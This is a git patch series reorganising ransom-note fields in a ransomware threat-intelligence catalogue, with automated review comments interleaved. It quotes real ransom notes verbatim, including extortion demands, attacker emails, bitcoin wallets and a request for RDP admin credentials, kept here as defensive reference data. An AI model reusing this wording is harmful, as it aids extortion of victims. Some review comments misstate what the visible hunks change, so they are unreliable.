- "ransomnotes": [
+ "ransomnotes-filenames": [
+ "ReadMe.txt"
+ ],
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_01.jpg",
 "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/ransom-note-html-part_02.jpg",
- "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/payment-portal.jpg",
- "ReadMe.txt"
+ "https://www.bleepstatic.com/images/news/ransomware/s/sigma/craigslist-malspam/payment-portal.jpg"
 ],
 "refs": [
 "https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/"
@@ -12456,7 +12710,7 @@ "meta": { "payment-method": "Dollars", "price": "80", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/savefiles/ransom-note-red.jpg" ], "refs": [ @@ -12475,8 +12729,10 @@ ".SAVEfiles." ], "payment-method": "Email", - "ransomnotes": [ - "!!!SAVE__FILES__INFO!!!.txt", + "ransomnotes-filenames": [ + "!!!SAVE__FILES__INFO!!!.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/savefiles/ransom-note-red.jpg" ], "refs": [ @@ -12495,10 +12751,14 @@ "payment-method": "Won", "price": "50 000 (50 $)", "ransomnotes": [ - "Warning!!!!!!.txt", - "https://www.bleepstatic.com/images/news/ransomware/f/file-locker/ransom-note%20-%20Copy.jpg", "한국어: 경고!!! 모든 문서, 사진, 데이테베이스 및 기타 중요한 파일이 암호화되었습니다!!\n당신은 돈을 지불해야 합니다\n비트코인 5만원을 fasfry2323@naver.com로 보내십시오 비트코인 지불코드: 1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX 결제 사이트 http://www.localbitcoins.com/ \nEnglish: Warning!!! All your documents, photos, databases and other important personal files were encrypted!!\nYou have to pay for it.\nSend fifty thousand won to fasfry2323@naver.com Bitcoin payment code: 1BoatSLRHtKNngkdXEeobR76b53LETtpyT Payment site http://www.localbitcoins.com/" ], + "ransomnotes-filenames": [ + "Warning!!!!!!.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/f/file-locker/ransom-note%20-%20Copy.jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/file-locker-ransomware-targets-korean-victims-and-asks-for-50k-won/" ] 
@@ -12515,10 +12775,14 @@ "payment-method": "Bitcoin", "price": "0.1", "ransomnotes": [ - "DECRYPTING.txt", - "https://www.bleepstatic.com/images/news/ransomware/c/CommonRansom/ransom-note.jpg", "+-----------------------+\n¦----+CommonRansom+-----¦\n+-----------------------+\nHello dear friend,\nYour files were encrypted!\nYou have only 12 hours to decrypt it\nIn case of no answer our team will delete your decryption password\nWrite back to our e-mail: old@nuke.africa\n\n\nIn your message you have to write:\n1. This ID-[VICTIM_ID]\n2. [IP_ADDRESS]:PORT(rdp) of infected machine\n3. Username:Password with admin rights\n4. Time when you have paid 0.1 btc to this bitcoin wallet:\n35M1ZJhTaTi4iduUfZeNA75iByjoQ9ibgF\n\n\nAfter payment our team will decrypt your files immediatly\n\n\nFree decryption as guarantee:\n1. File must be less than 10MB\n2. Only .txt or .lnk files, no databases\n3. Only 5 files\n\n\nHow to obtain bitcoin:\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/" ], + "ransomnotes-filenames": [ + "DECRYPTING.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/c/CommonRansom/ransom-note.jpg" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/commonransom-ransomware-demands-rdp-access-to-decrypt-files/" ] 
@@ -12550,9 +12814,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "readmy.txt", "Attention! All your files are encrypted!\nTo recover your files and access them,\nsend a message with your id to email DecryptFox@protonmail.com\n \nPlease note when installing or running antivirus will be deleted\n important file to decrypt your files and data will be lost forever!!!!\n \nYou have 5 attempts to enter the code. If you exceed this\nthe number, all the data, will be irreversibly corrupted. Be\ncareful when entering the code!\n \nyour id [redacted 32 lowercase hex]" ], + "ransomnotes-filenames": [ + "readmy.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/", "https://twitter.com/demonslay335/status/1049325784979132417" @@ -12569,7 +12835,7 @@ ], "payment-method": "Bitcoin", "price": "780 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "#RECOVERY_FILES#.txt" ], "refs": [ @@ -12588,7 +12854,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/september/14/mvp.jpg" ], "refs": [ 
@@ -12605,9 +12871,11 @@ "payment-method": "Bitcoin", "price": "0.8", "ransomnotes": [ - "read_me_for_recover_your_files.txt", "All your important files on this device have been encrypted.\n\nNo one can decrypt your files except us.\n\nIf you want to recover all your files. contact us via E-mail.\nDON'T forget to send us your ID!!!\n\nTo recover your files,You have to pay 0.8 bitcoin.\n\n\n\n\nContact Email : Leviathan13@protonmail.com\n\nYour ID :\n\n[redacted 0x200 bytes in base64 form]\n\n\nFree decryption as guarantee\n\nIf you can afford the specified amount of bitcoin,\nyou can send to us up to 2 files for demonstration.\n\nPlease note that files must NOT contain valuable information\nand their total size must be less than 2Mb." ], + "ransomnotes-filenames": [ + "read_me_for_recover_your_files.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/", "" @@ -12638,7 +12906,7 @@ ], "payment-method": "Bitcoin", "price": "0.002 (50 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/9/moira.jpg" ], "refs": [ 
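Review bot: The `refs` array in the first hunk still ends with an empty string (`""`) right after the bleepingcomputer link; the commit normalizes this record's note fields but leaves that blank reference in place, which a schema that requires non-empty URIs would reject and which consumers will render as an empty link. Drop it so the array reads `"refs": [ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/" ]`. A quick `jq` pass for empty strings in any `refs` array would catch sibling records with the same defect before the version is bumped. The record's enclosing object starts before the hunk.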
@@ -12661,9 +12929,11 @@ "payment-method": "Bitcoin", "price": "25 000 sek (sweden)", "ransomnotes": [ - "aboutYourFiles.txt", "Hi. Thank you for using my program. If you're reading this, a lot of your files have\nbeen encrypted. To decrypt them, you need my decryption program. For this, I want 25 000 sek, I want\nthem in bitcoin. Email me when you've paid with details about the transaction. I'll give you two days.\nIf you have not paid in two days(from the day you received the email), It will cost 1000 sek more per day.\n If I have not heard from you after five days (from the day you received the email), I assume your files are not that\nimportant to you. So I'll delete your decryption-key, and you will never see your files again.\n\n\nAfter the payment, email me the following information:\n* the bitcoin address you sent from (important, write it down when you do the transaction)\n* the ID at the bottom of this document (this is important!! Otherwise I don't know which key belongs\nto you).\nThen I will send you the decryption-program and provide you with instructions of how to remove\nthe virus if you have not already figured it out.\n\n\nEmail:\naperfectday2018@protonmail.com\n\nBitcoin adress: \n1LX3tBkW161hoF5DbGzbrm3sdXaF6XHv2D\n\nMake sure to get the bitcoin adress right, copy and paste and double check. If you send the bitcoin\nto the wrong adress, it will be lost forever. You cant stop or regret a bitcoin transaction.\n\n\nIMPORTANT: \n\nDo not loose this document. You also have a copy of it on your desktop.\nDo NOT change any filenames!!! !!!\n\n\nThank you for the money, it means a lot to me. \n\n\n\nID: [redacted 13 numbers]" ], + "ransomnotes-filenames": [ + "aboutYourFiles.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1059470985055875074", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/" 
@@ -12679,9 +12949,11 @@ ], "payment-method": "Bitcoin", "price": "300 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "how to get back you files.txt", - "Attention MOTHERFUCKER!\n\nAll your main files were encrypted!\n\nYour personal files (documents, databases, jpeg, docx, doc,\netc.) were encrypted, their further using impossible.\nTO DECRYPT YOUR FILES YOU NEED TO BUY A SOFTWARE WITH YOUR UNIQUE PRIVATE KEY. ONLY OUR\nSOFTWARE WILL ALLOW YOU DECRYPT YOUR FILES.\nNOTE:\nYou have only 6 hours from the moment when an encryption was done to buy our software at $300, in bitcoin\nYou all files will get deleted after the lapse of 6 hours.\nAny attempts to remove this encryption will be unsuccessful. You cannot do this without our software with your key.\nDo not send any emails with threats and rudeness to us. Example of email format: Hi, I need a decryption of my files.\n\nBitcoin address = 1GstvLM6SumX3TMMgN9PvXQsEy3FR9ZqWX\n\nContact us by email only: ayaan321308@gmail.com", + "Attention MOTHERFUCKER!\n\nAll your main files were encrypted!\n\nYour personal files (documents, databases, jpeg, docx, doc,\netc.) were encrypted, their further using impossible.\nTO DECRYPT YOUR FILES YOU NEED TO BUY A SOFTWARE WITH YOUR UNIQUE PRIVATE KEY. ONLY OUR\nSOFTWARE WILL ALLOW YOU DECRYPT YOUR FILES.\nNOTE:\nYou have only 6 hours from the moment when an encryption was done to buy our software at $300, in bitcoin\nYou all files will get deleted after the lapse of 6 hours.\nAny attempts to remove this encryption will be unsuccessful. You cannot do this without our software with your key.\nDo not send any emails with threats and rudeness to us. Example of email format: Hi, I need a decryption of my files.\n\nBitcoin address = 1GstvLM6SumX3TMMgN9PvXQsEy3FR9ZqWX\n\nContact us by email only: ayaan321308@gmail.com" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/DrkmCriWwAMCdqF.jpg" ], "refs": [ 
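Review bot: The full ransom-note text (`"Attention MOTHERFUCKER!\n\nAll your main files were encrypted!…"`) ends up inside `ransomnotes-filenames`, next to `how to get back you files.txt`, because the hunk renames the enclosing key instead of splitting the array; only the `.txt` entry is a filename. Keep the filename under `ransomnotes-filenames`, move the note body into its own `ransomnotes` array — `"ransomnotes": [ "Attention MOTHERFUCKER!…ayaan321308@gmail.com" ], "ransomnotes-filenames": [ "how to get back you files.txt" ],` — and leave the pbs.twimg.com image under `ransomnotes-refs`, matching the three-key shape used for the other records in this patch. The follow-up commit in this series repairs the same kind of misplacement at other offsets (-94, -695, -1302), but none of its visible hunks touches this record, so the note text still sits under the filenames key. The entry's enclosing object starts before the hunk.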
@@ -12698,7 +12970,7 @@
 ".Vapor"
 ],
 "payment-method": "Email",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/vapor.jpg"
 ],
 "refs": [
@@ -12717,7 +12989,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.00000001",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsPVGaHXcAAtnXz[1].jpg"
 ],
 "refs": [
@@ -12736,11 +13008,13 @@
 ],
 "payment-method": "Bitcoin",
 "price": "999999.5",
- "ransomnotes": [
- "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsiUA0LXgAAoqkd[1].jpg",
- "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsuMFrZW0AIIUXs[1].jpg",
+ "ransomnotes-filenames": [
 "!=How_recovery_files=!.html"
 ],
+ "ransomnotes-refs": [
+ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsiUA0LXgAAoqkd[1].jpg",
+ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsuMFrZW0AIIUXs[1].jpg"
+ ],
 "refs": [
 "https://twitter.com/petrovic082/status/1065223932637315074",
 "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/",
@@ -12761,7 +13035,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.00000001",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/30/Ds4IYbfWsAECNuJ[1].jpg",
 "https://pbs.twimg.com/media/Ds4IKL3X4AIHKrj.jpg",
 "https://pbs.twimg.com/media/Ds4IYbfWsAECNuJ.jpg"
@@ -12784,9 +13058,11 @@ "payment-method": "Bitcoin", "price": "1", "ransomnotes": [ - "_How_To_Decrypt_My_File_.txt", "I am sorry to tell you.\nSome files has crypted\nif you want your files back , send 1 bitcoin to my wallet\nmy wallet address : 3HCBsZ6QQTnSsthbmVtYE4XSZtism4j7qd\nIf you have any questions, please contact us.\n\nEmail:[nmare@cock.li]" ], + "ransomnotes-filenames": [ + "_How_To_Decrypt_My_File_.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1067109661076262913", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/" @@ -12817,7 +13093,7 @@ ".israbye" ], "payment-method": "Politic", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/Dtlxf0eW4AAJCdZ[1].jpg", "https://pbs.twimg.com/media/DtlxfFsW4AAs-Co.jpg" ], @@ -12836,7 +13112,7 @@ "prepend (encrypted)" ], "payment-method": "Bitcoin Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/DtkQKCDWoAM13kD[1].jpg" ], "refs": [ @@ -12864,9 +13140,11 @@ ".FJ7QvaR9VUmi" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ + "DECRYPT.txt" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/Dtz4PD2WoAIWtRv.jpg", - "DECRYPT.txt", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/14/Dt-APfCW0AADWV8[1].jpg" ], "refs": [ @@ -12889,7 +13167,7 @@ ], "payment-method": "Bitcoin", "price": "900 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/Dt1_DpMXcAMC8J_[1].jpg" ], "refs": [ @@ -12922,8 +13200,10 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ - "README_BACK_FILES.htm", + "ransomnotes-filenames": [ + "README_BACK_FILES.htm" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/Dt4xTDjWwAEBjBh.jpg" ], "refs": [ 
@@ -12943,9 +13223,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "!!!READ_IT!!!.txt", "!!! ATTENTION, YOUR FILES WERE ENCRYPTED !!!\n\nPlease follow few steps below:\n\n1.Send us your ID.\n2.We can decrypt 1 file what would you make sure that we have decription tool!\n3.Then you'll get payment instruction and after payment you will get your decryption tool!\n\n\n Do not try to rename files!!! Only we can decrypt all your data!\n\n Contact us:\n\ngetmydata@india.com\nmydataback@aol.com\n\n Your ID:[redacted 64 uppercase hex]:[redacted 64 uppercase hex with dashes]\n[redacted 64 uppercase hex with dashes]:[redacted 64 uppercase hex with dashes]" ], + "ransomnotes-filenames": [ + "!!!READ_IT!!!.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1072164314608480257" ] @@ -12959,8 +13241,10 @@ ".locked" ], "payment-method": "Email", - "ransomnotes": [ - "ODSZYFRFUJ_PLIKI_TERAZ.txt", + "ransomnotes-filenames": [ + "ODSZYFRFUJ_PLIKI_TERAZ.txt" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/DuIsIoWXQAEGKlr.jpg" ], "refs": [ 
@@ -12977,9 +13261,11 @@ ], "payment-method": "Email", "ransomnotes": [ - "_openme.txt", "---------------------------------------------- ALL YOUR FILES ARE ENCRYPTED ----------------------------------------------- \n\nDon't worry, you can return all your files!\nAll your files documents, photos, databases and other important are encrypted with strongest encryption and unique key.\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\nThis software will decrypt all your encrypted files.\nWhat guarantees do we give to you?\nYou can send one of your encrypted file from your PC and we decrypt it for free.\nBut we can decrypt only 1 file for free. File must not contain valuable information\nDon't try to use third-party decrypt tools because it will destroy your files.\nDiscount 50% available if you contact us first 72 hours.\n\n---------------------------------------------------------------------------------------------------------------------------\n\n\nTo get this software you need write on our e-mail:\nhelpshadow@india.com\n\nReserve e-mail address to contact us:\nhelpshadow@firemail.cc\n\nYour personal ID:\n[redacted 43 alphanumeric chars]" ], + "ransomnotes-filenames": [ + "_openme.txt" + ], "refs": [ "https://twitter.com/demonslay335/status/1072907748155842565" ] @@ -13152,4 +13438,4 @@ } ], "version": 62 -} +} \ No newline at end of file From f5a7efaadc81b2cdb1e9b3589ef5c4a4d365cbca Mon Sep 17 00:00:00 2001 From: Deborah Servili Date: Thu, 23 May 2019 12:39:53 +0200 Subject: [PATCH 49/50] jq --- clusters/ransomware.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 7ea0968..3a97015 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -13438,4 +13438,4 @@ } ], "version": 62 -} \ No newline at end of file +} From 9d8d5ce1c845a2ee7679b46f930a3b88300b4142 Mon Sep 17 00:00:00 2001 
From: Deborah Servili Date: Thu, 23 May 2019 16:23:09 +0200 Subject: [PATCH 50/50] fix ransomware ransomnotes --- clusters/ransomware.json | 48 ++++++++++++++++++++++++++-------------- 1 file changed, 31 insertions(+), 17 deletions(-)
diff --git a/clusters/ransomware.json b/clusters/ransomware.json
index 3a97015..1eae530 100644
--- a/clusters/ransomware.json
+++ b/clusters/ransomware.json
@@ -94,7 +94,7 @@
 "meta": {
 "date": "March 2017",
 "encryption": "AES-128",
- "ransomnotes-filenames": [
+ "ransomnotes": [
 "DANGEROUS_RANSOM\nHacked.\nPlease contact\nhakermail@someting.com"
 ],
 "refs": [
@@ -695,7 +695,7 @@
 "extensions": [
 ".damage"
 ],
- "ransomnotes-filenames": [
+ "ransomnotes": [
 "TtWGgOd57SvPlkgZ***\n ==========\n end of secret_key \nTo restore your files - send e-mail to damage@india.com"
 ],
 "refs": [
@@ -1302,10 +1302,12 @@ ".<7_random_letters>" ], "payment-method": "Email", + "ransomnotes": [ + "WARNING! Your personal files are encrypted! Your most important files on this computer have been encrypted: photos, documents, videos, music, etc. You can verify this by trying to open such files. Encryption was produced using an UNIQUE public RSA-4096 key, specially generated for this computer only, thus making it impossible to decrypt such files without knowing private key and comprehensive decipher software. We have left on our server a copy of the private key, along with all required software for the decryption. To make sure that software is working as intended you have a possibility to decrypt one file for free, see contacts below. The private key will be destroyed after 7 days, afterwards making it impossible to decrypt your files. Encryption date: *** Private key destruction date: *** For obtaining decryption software, please, contact: myserverdoctor@gmail.com or XMPP jabber: doctordisk@jabbim.com" + ], "ransomnotes-filenames": [ "encrypted_readme.txt", - "__encrypted_readme.txt", - "WARNING! Your personal files are encrypted! Your most important files on this computer have been encrypted: photos, documents, videos, music, etc. You can verify this by trying to open such files. Encryption was produced using an UNIQUE public RSA-4096 key, specially generated for this computer only, thus making it impossible to decrypt such files without knowing private key and comprehensive decipher software. We have left on our server a copy of the private key, along with all required software for the decryption. To make sure that software is working as intended you have a possibility to decrypt one file for free, see contacts below. The private key will be destroyed after 7 days, afterwards making it impossible to decrypt your files. 
Encryption date: *** Private key destruction date: *** For obtaining decryption software, please, contact: myserverdoctor@gmail.com or XMPP jabber: doctordisk@jabbim.com" + "__encrypted_readme.txt" ], "ransomnotes-refs": [ "https://2.bp.blogspot.com/-CLo4JTpveKY/WI4sVXEQSPI/AAAAAAAADcU/n8qrwehDEQMlG845cjNow_fC4PDqlvPIQCLcB/s1600/note_2.png" 
@@ -3686,15 +3688,15 @@
 "ransomnotes": [
 "all your data has been locked us\nYou want to return?\nwrite email paymentbtc@firemail.cc",
 "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\nWrite this ID in the title of your message ACBFF130\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\nhttps://localbitcoins.com/buy_bitcoins\nAlso you can find other places to buy Bitcoins and beginners guide here:\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\nAttention!\nDo not rename encrypted files.\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.",
- "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. 
After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam."
+ "All your files have been encrypted!\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\nWrite this ID in the title of your message BCBEF350\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \nFree decryption as guarantee\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \nHow to obtain Bitcoins\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. 
\nhttps://localbitcoins.com/buy_bitcoins \nAlso you can find other places to buy Bitcoins and beginners guide here: \nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \nAttention!\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software, it may cause permanent data loss.\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.",
+ "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com"
 ],
 "ransomnotes-filenames": [
 "README.txt",
 "README.jpg",
 "Info.hta",
 "FILES ENCRYPTED.txt",
- "INFO.hta",
- "all your data has been locked us\nYou want to return?\nwrite email Beamsell@qq.com"
+ "INFO.hta"
 ],
 "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg",
@@ -4716,7 +4718,7 @@
 "encryption": "AES-256",
 "payment-method": "Bitcoin",
 "price": "2",
- "ransomnotes-filenames": [
+ "ransomnotes": [
 "Attention! ! ! All of your copies of your system have been permanently deleted and the data on all partitions and workstations have been encrypted! Stay calm. You can recover all your data by making a payment of 2 BTC (1200 USD) in Bitcoin currency to receive a decryption key. To purchase Bitcions you can use www.coinbase.com After buying BTC send the equivalent of 2 BTC (1200 USD) to our BTC adress : 16jX5RbF2pEcLYHPukazWhDCkxXTs7ZCxB After payment contact us to receive your decryption key. In mail title write your unique ID: {custom id visually resembling a MAC address} Our e-mail: crypt302@gmx.com"
 ],
 "refs": [
@@ -6541,7 +6543,14 @@
 "payment-method": "Bitcoin",
 "price": "1.2 (500$) - 2.4",
 "ransomnotes-filenames": [
- "de_crypt_readme.bmp, .txt, .html"
+ "de_crypt_readme.bmp",
+ "de_crypt_readme.txt",
+ "de_crypt_readme.html",
+ "[victim_id].html",
+ "[victim_id].bmp",
+ "!Recovery_[victim_id].bmp",
+ "!Recovery_[victim_id].html",
+ "!Recovery_[victim_id].txt"
 ],
 "refs": [
 "https://support.kaspersky.com/viruses/disinfection/8547",
@@ -6573,7 +6582,9 @@
 "payment-method": "Bitcoin",
 "price": "1.2 (500$) - 2.4",
 "ransomnotes-filenames": [
- ".txt, .html, .bmp"
+ ".txt",
+ ".html",
+ ".bmp"
 ],
 "refs": [
 "https://support.kaspersky.com/viruses/disinfection/8547",
@@ -7470,7 +7481,8 @@
 "payment-method": "Bitcoin",
 "price": "0.5(190 - 250 $)",
 "ransomnotes-filenames": [
- "UNLOCK_FILES_INSTRUCTIONS.html and .txt"
+ "UNLOCK_FILES_INSTRUCTIONS.html",
+ "UNLOCK_FILES_INSTRUCTIONS.txt"
 ],
 "refs": [
 "http://www.bleepingcomputer.com/forums/t/611342/gnl-locker-support-and-help-topic-locked-and-unlock-files-instructionshtml/",
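Review bot: The new `[victim_id]` entries in the `-6541` hunk introduce a square-bracket placeholder, whereas the same array elsewhere in this file writes placeholders in angle brackets (`".<7_random_letters>"` in the `-1302` hunk), so a consumer matching observed note names against `ransomnotes-filenames` has no single rule for telling a template apart from a literal name. Consider `"<victim_id>.html"`, `"<victim_id>.bmp"`, `"!Recovery_<victim_id>.bmp"` and so on so the convention stays uniform, or record the placeholder syntax once in the cluster's description.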
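Review bot: Splitting `".txt, .html, .bmp"` in the `-6573` hunk into `".txt"`, `".html"` and `".bmp"` leaves three bare extensions in `ransomnotes-filenames`; they are not filenames and will never match a note observed on a host. The removed value presumably meant "the same note dropped in three formats" with the base name not recorded; if it is the `de_crypt_readme` note of the entry just above (both entries carry the same price and the same Kaspersky reference), write `"de_crypt_readme.txt"` etc. here as well, otherwise keep one documented placeholder per format such as `"<note_name>.txt"` rather than an extension on its own.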
@@ -11564,13 +11576,13 @@
 "Hello... :)\nFor instructions on how to recovery the files, write to me:\njonskuper578@india.com\njonskuper578@gmx.de\njonskuper578@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again.",
 "WARNING!!!\nYour ID 83624883\nOUR FILES ARE DECRIPTED\nYour documents, photos, database, save games and other important data was encrypted.\nData recovery the necessary interpreter. To get the interpreter, should send an email to helppme@india.com or hepl1112@aol.com.\nIn a letter to include Your personal ID (see the beginning of this document).\nIn response to the letter You will receive the address of your Bitcoin wallet to which you want to perform the transfer.\nWhen money transfer is confirmed, You will receive the decrypter file for Your computer.\nAfter starting the programm-interpreter, all Your files will be restored.\nAttention! Do not attempt to remove a program or run the anti-virus tools.",
 "ПРЕДУПРЕЖДЕНИЕ!!!\nВаш ID 83624883\nOUR FILES ARE DECRIPTED\nЗашифрованы ваши документы, фотографии, база данных, сохранения игр и другие важные данные.\nВосстановить данные нужен интерпретатор. Для получения интерпретатора надо отправить email на helppme@india.com или hepl1112@aol.com.\nВ письме укажите Ваш личный ID (см. начало этого документа).\nВ ответ на письмо Вы получите адрес вашего биткойн-кошелька, на который Вы хотите сделать перевод.\nКогда денежный перевод будет подтвержден, вы получите файл-декриптер для Вашего компьютера.\nПосле запуска программы-интерпретатора все Ваши файлы будут восстановлены.\nВнимание! Не пытайтесь удалить программу или запустить антивирусные программы.",
- "Hello…\nFor instructions on how to recovery the files, write to me:\nvine77725@gmx.de\nvine77725@india.com\nvine77725@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again."
+ "Hello…\nFor instructions on how to recovery the files, write to me:\nvine77725@gmx.de\nvine77725@india.com\nvine77725@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again.",
+ "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com",
+ "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com"
 ],
 "ransomnotes-filenames": [
 "How_return_files.txt",
- "Image.jpg",
- "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com",
- "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com"
+ "Image.jpg"
 ],
 "ransomnotes-refs": [
 "https://4.bp.blogspot.com/-6jE-GW6wCr8/WQY1L_uHsFI/AAAAAAAAE-A/3YR0bwwBJqgp8CsApZq4F_44JkMB0m2WwCLcB/s320/image-note.jpg",
@@ -12949,10 +12961,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "300 $",
- "ransomnotes-filenames": [
- "how to get back you files.txt",
+ "ransomnotes": [
